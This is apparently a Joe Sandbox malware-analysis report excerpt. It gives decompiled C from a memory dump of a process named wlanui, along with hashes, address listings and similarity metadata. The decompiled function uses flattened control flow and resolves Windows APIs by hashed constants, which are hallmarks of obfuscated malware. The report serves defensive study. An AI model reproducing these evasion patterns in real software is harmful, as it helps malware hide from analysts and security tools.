                                                        • Instruction ID: 41a451a8d4c5a5ba4fb47b93cee60d661e68fd99e92a8d1162e2cf305f1226cf
                                                        • Opcode Fuzzy Hash: 9462cd8e005c782a603937dcbc04c46934b1a3329fafc9beea68d9da4e4c480d
                                                        • Instruction Fuzzy Hash: 5351B731B4420187DB14BF69DD84A2E36A6EB84754F244C2FF701CB354EB78DD018B4A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 61%
                                                        			E00481FD8(void* __eax, intOrPtr* __edi) {
                                                        				void* _t20;
                                                        				intOrPtr _t23;
                                                        				signed int _t24;
                                                        				intOrPtr* _t29;
                                                        				intOrPtr* _t33;
                                                        				intOrPtr* _t36;
                                                        				signed int _t37;
                                                        				intOrPtr* _t41;
                                                        				intOrPtr* _t45;
                                                        				intOrPtr* _t48;
                                                        				intOrPtr _t51;
                                                        				intOrPtr _t57;
                                                        				intOrPtr* _t73;
                                                        				intOrPtr* _t75;
                                                        				intOrPtr _t78;
                                                        				intOrPtr _t81;
                                                        				intOrPtr* _t82;
                                                        				void* _t85;
                                                        				void* _t88;
                                                        				void* _t89;
                                                        
                                                        				_t75 = __edi;
                                                        				_t20 = __eax;
                                                        				goto L2;
                                                        				do {
                                                        					while(1) {
                                                        						L2:
                                                        						_t88 = _t20 - 0x12f3165e;
                                                        						if(_t88 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t88 == 0) {
                                                        							_t29 =  *0x48dd24; // 0x0
                                                        							__eflags = _t29;
                                                        							if(_t29 == 0) {
                                                        								_t29 = E00483E60(_t48, E00483F00(0x26f5757c), 0x56a553d3, _t82);
                                                        								 *0x48dd24 = _t29;
                                                        							}
                                                        							_t51 =  *0x48e544; // 0x314640
                                                        							_t14 = _t51 + 8; // 0x2d809c8
                                                        							__eflags =  *_t29( *((intOrPtr*)(_t85 + 0x24)), _t78, 0x60,  *_t14, 0, 0);
                                                        							_t20 = 0x317ab9d;
                                                        							_t75 =  !=  ? 1 : _t75;
                                                        							continue;
                                                        						} else {
                                                        							_t89 = _t20 - 0x58a511f;
                                                        							if(_t89 > 0) {
                                                        								__eflags = _t20 - 0x5f533d5;
                                                        								if(_t20 == 0x5f533d5) {
                                                        									__eflags = _t75;
                                                        									if(_t75 == 0) {
                                                        										E00484220(_t48,  *_t48);
                                                        									}
                                                        									goto L40;
                                                        								} else {
                                                        									__eflags = _t20 - 0xecfc0ca;
                                                        									if(_t20 != 0xecfc0ca) {
                                                        										goto L36;
                                                        									} else {
                                                        										_t33 =  *0x48e1e0;
                                                        										_t81 =  *_t48;
                                                        										__eflags = _t33;
                                                        										if(_t33 == 0) {
                                                        											_t33 = E00483E60(_t48, E00483F00(0xc6fbcd74), 0x624eee2, _t82);
                                                        											 *0x48e1e0 = _t33;
                                                        										}
                                                        										 *_t33(_t81,  *((intOrPtr*)(_t85 + 0x20)),  *((intOrPtr*)(_t85 + 0x18)));
                                                        										_t85 = _t85 + 0xc;
                                                        										_t20 = 0x225c46c1;
                                                        										_t78 =  *((intOrPtr*)(_t85 + 0x14));
                                                        										continue;
                                                        									}
                                                        								}
                                                        							} else {
                                                        								if(_t89 == 0) {
                                                        									_t36 =  *0x48dff0;
                                                        									__eflags = _t36;
                                                        									if(_t36 == 0) {
                                                        										_t36 = E00483E60(_t48, E00483F00(0x26f5757c), 0xc7ccd5be, _t82);
                                                        										 *0x48dff0 = _t36;
                                                        									}
                                                        									_t57 =  *0x48e544; // 0x314640
                                                        									_t11 = _t57 + 0x1c; // 0x2d80df0
                                                        									_t37 =  *_t36( *_t11, 0, 0, _t85 + 0x10);
                                                        									asm("sbb eax, eax");
                                                        									_t20 = ( ~_t37 & 0x08da8cf5) + 0x5f533d5;
                                                        									continue;
                                                        								} else {
                                                        									if(_t20 == 0xc0acb) {
                                                        										 *((intOrPtr*)(_t48 + 4)) =  *((intOrPtr*)(_t82 + 4)) + 0xffffff8c;
                                                        										_t41 = E004842C0(_t48,  *((intOrPtr*)(_t82 + 4)) + 0xffffff8c);
                                                        										 *_t48 = _t41;
                                                        										__eflags = _t41;
                                                        										if(_t41 == 0) {
                                                        											L40:
                                                        											return _t75;
                                                        										} else {
                                                        											_t78 =  *_t82;
                                                        											 *((intOrPtr*)(_t85 + 0x14)) = _t78;
                                                        											 *((intOrPtr*)(_t85 + 0x1c)) = _t78 + 0x74;
                                                        											 *((intOrPtr*)(_t85 + 0x18)) =  *((intOrPtr*)(_t82 + 4)) - 0x74;
                                                        											_t20 = 0x58a511f;
                                                        											continue;
                                                        										}
                                                        									} else {
                                                        										if(_t20 != 0x317ab9d) {
                                                        											goto L36;
                                                        										} else {
                                                        											_t45 =  *0x48e308;
                                                        											if(_t45 == 0) {
                                                        												_t45 = E00483E60(_t48, E00483F00(0x26f5757c), 0xd8b73a4f, _t82);
                                                        												 *0x48e308 = _t45;
                                                        											}
                                                        											 *_t45( *((intOrPtr*)(_t85 + 0x10)));
                                                        											_t20 = 0x5f533d5;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L41:
                                                        					}
                                                        					__eflags = _t20 - 0x2fa233da;
                                                        					if(__eflags > 0) {
                                                        						__eflags = _t20 - 0x349446de;
                                                        						if(_t20 != 0x349446de) {
                                                        							goto L36;
                                                        						} else {
                                                        							_t20 = 0xc0acb;
                                                        							goto L2;
                                                        						}
                                                        					} else {
                                                        						if(__eflags == 0) {
                                                        							_t20 = 0x21b6ea48;
                                                        							goto L2;
                                                        						} else {
                                                        							__eflags = _t20 - 0x21b6ea48;
                                                        							if(_t20 == 0x21b6ea48) {
                                                        								__eflags =  *((intOrPtr*)(_t82 + 4)) - 0x74;
                                                        								if( *((intOrPtr*)(_t82 + 4)) < 0x74) {
                                                        									goto L40;
                                                        								} else {
                                                        									_t20 = 0x349446de;
                                                        									goto L2;
                                                        								}
                                                        							} else {
                                                        								__eflags = _t20 - 0x225c46c1;
                                                        								if(_t20 != 0x225c46c1) {
                                                        									goto L36;
                                                        								} else {
                                                        									_t73 =  *0x48deb8; // 0x0
                                                        									__eflags = _t73;
                                                        									if(_t73 == 0) {
                                                        										_t73 = E00483E60(_t48, E00483F00(0x26f5757c), 0x3174712a, _t82);
                                                        										 *0x48deb8 = _t73;
                                                        									}
                                                        									_t23 =  *0x48e544; // 0x314640
                                                        									_t18 = _t23 + 0x10; // 0x2d80b20
                                                        									_t24 =  *_t73( *_t18,  *((intOrPtr*)(_t85 + 0x20)), 1, 0,  *_t48, _t48 + 4);
                                                        									asm("sbb eax, eax");
                                                        									_t20 = ( ~_t24 & 0x0fdb6ac1) + 0x317ab9d;
                                                        									goto L2;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L41;
                                                        					L36:
                                                        					__eflags = _t20 - 0x22073c7b;
                                                        				} while (_t20 != 0x22073c7b);
                                                        				return _t75;
                                                        				goto L41;
                                                        			}























                                                        0x00481fd8
                                                        0x00481fd8
                                                        0x00481fd8
                                                        0x00481fe0
                                                        0x00481fe0
                                                        0x00481fe0
                                                        0x00481fe0
                                                        0x00481fe5
                                                        0x00000000
                                                        0x00000000
                                                        0x00481feb
                                                        0x0048211a
                                                        0x0048211f
                                                        0x00482121
                                                        0x00482134
                                                        0x00482139
                                                        0x00482139
                                                        0x0048213e
                                                        0x00482148
                                                        0x00482154
                                                        0x0048215b
                                                        0x00482160
                                                        0x00000000
                                                        0x00481ff1
                                                        0x00481ff1
                                                        0x00481ff6
                                                        0x004820c6
                                                        0x004820cb
                                                        0x00482212
                                                        0x00482214
                                                        0x00482218
                                                        0x00482218
                                                        0x00000000
                                                        0x004820d1
                                                        0x004820d1
                                                        0x004820d6
                                                        0x00000000
                                                        0x004820dc
                                                        0x004820dc
                                                        0x004820e1
                                                        0x004820e3
                                                        0x004820e5
                                                        0x004820f8
                                                        0x004820fd
                                                        0x004820fd
                                                        0x0048210b
                                                        0x0048210d
                                                        0x00482110
                                                        0x00481fd2
                                                        0x00000000
                                                        0x00481fd2
                                                        0x004820d6
                                                        0x00481ffc
                                                        0x00481ffc
                                                        0x0048207b
                                                        0x00482080
                                                        0x00482082
                                                        0x00482095
                                                        0x0048209a
                                                        0x0048209a
                                                        0x004820a4
                                                        0x004820ae
                                                        0x004820b1
                                                        0x004820b5
                                                        0x004820bc
                                                        0x00000000
                                                        0x00481ffe
                                                        0x00482003
                                                        0x00482047
                                                        0x0048204a
                                                        0x0048204f
                                                        0x00482051
                                                        0x00482053
                                                        0x0048221d
                                                        0x00482226
                                                        0x00482059
                                                        0x00482059
                                                        0x0048205c
                                                        0x00482063
                                                        0x0048206d
                                                        0x00482071
                                                        0x00000000
                                                        0x00482071
                                                        0x00482005
                                                        0x0048200a
                                                        0x00000000
                                                        0x00482010
                                                        0x00482010
                                                        0x00482017
                                                        0x0048202a
                                                        0x0048202f
                                                        0x0048202f
                                                        0x00482038
                                                        0x0048203a
                                                        0x00000000
                                                        0x0048203a
                                                        0x0048200a
                                                        0x00482003
                                                        0x00481ffc
                                                        0x00481ff6
                                                        0x00000000
                                                        0x00481feb
                                                        0x00482168
                                                        0x0048216d
                                                        0x004821ec
                                                        0x004821f1
                                                        0x00000000
                                                        0x004821f3
                                                        0x004821f3
                                                        0x00000000
                                                        0x004821f3
                                                        0x0048216f
                                                        0x0048216f
                                                        0x004821e2
                                                        0x00000000
                                                        0x00482171
                                                        0x00482171
                                                        0x00482176
                                                        0x004821d2
                                                        0x004821d6
                                                        0x00000000
                                                        0x004821d8
                                                        0x004821d8
                                                        0x00000000
                                                        0x004821d8
                                                        0x00482178
                                                        0x00482178
                                                        0x0048217d
                                                        0x00000000
                                                        0x0048217f
                                                        0x0048217f
                                                        0x00482185
                                                        0x00482187
                                                        0x0048219f
                                                        0x004821a1
                                                        0x004821a1
                                                        0x004821a7
                                                        0x004821ba
                                                        0x004821bd
                                                        0x004821c1
                                                        0x004821c8
                                                        0x00000000
                                                        0x004821c8
                                                        0x0048217d
                                                        0x00482176
                                                        0x0048216f
                                                        0x00000000
                                                        0x004821fd
                                                        0x004821fd
                                                        0x004821fd
                                                        0x00482211
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335374791.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                        • Associated: 0000000F.00000002.2335370463.0000000000480000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335386868.000000000048D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335391948.000000000048F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_480000_wlanui.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 59121e097609c87f89718b79aa5ea85385398102127105aff334a774c0cd26db
                                                        • Instruction ID: d4001c0b4f8e7331d991a1c141d9e29030ec9ea28b2ca9bd44c1adb86926a5e1
                                                        • Opcode Fuzzy Hash: 59121e097609c87f89718b79aa5ea85385398102127105aff334a774c0cd26db
                                                        • Instruction Fuzzy Hash: 9BE092306103008ADE347B5D8ACD63F22A2BB45B81F680C1FEB10C7221EBAD8D40CB5E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335360642.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_460000_wlanui.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Eight$Five$Four$Nine$One$Seven$Six$Ten$Three$Two
                                                        • API String ID: 0-211638553
                                                        • Opcode ID: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                        • Instruction ID: 784addbcdce24437556e6f5279c707bdb528a3c3697ee0bf8c6114dacfe42706
                                                        • Opcode Fuzzy Hash: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                        • Instruction Fuzzy Hash: C5311A38E412289BCB04DB98CD80AEE7BB5FF48340B508027D502737A4DB789986CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335360642.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_460000_wlanui.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove
                                                        • String ID:
                                                        • API String ID: 1951056069-0
                                                        • Opcode ID: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                        • Instruction ID: 7f4a2ec1ab483d1c88a8a38d4c7c4b8ea40a2fdbf928ec73e0beca19e9e6ed35
                                                        • Opcode Fuzzy Hash: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                        • Instruction Fuzzy Hash: 4B51A472A083015BD720EF26D841B5BB3D8AFD4799F04052FF548E7241F279D9458BAB
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335360642.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_460000_wlanui.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove
                                                        • String ID:
                                                        • API String ID: 1951056069-0
                                                        • Opcode ID: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                        • Instruction ID: fc54c6c6c1f7151105815eb136b5321210dca86ad8713e6cb3a6192a7576cbaf
                                                        • Opcode Fuzzy Hash: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                        • Instruction Fuzzy Hash: 074136B16143015BC724DEAACC45BABB2D9EBE4B84F08493FF640D6241F278D50887AF
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%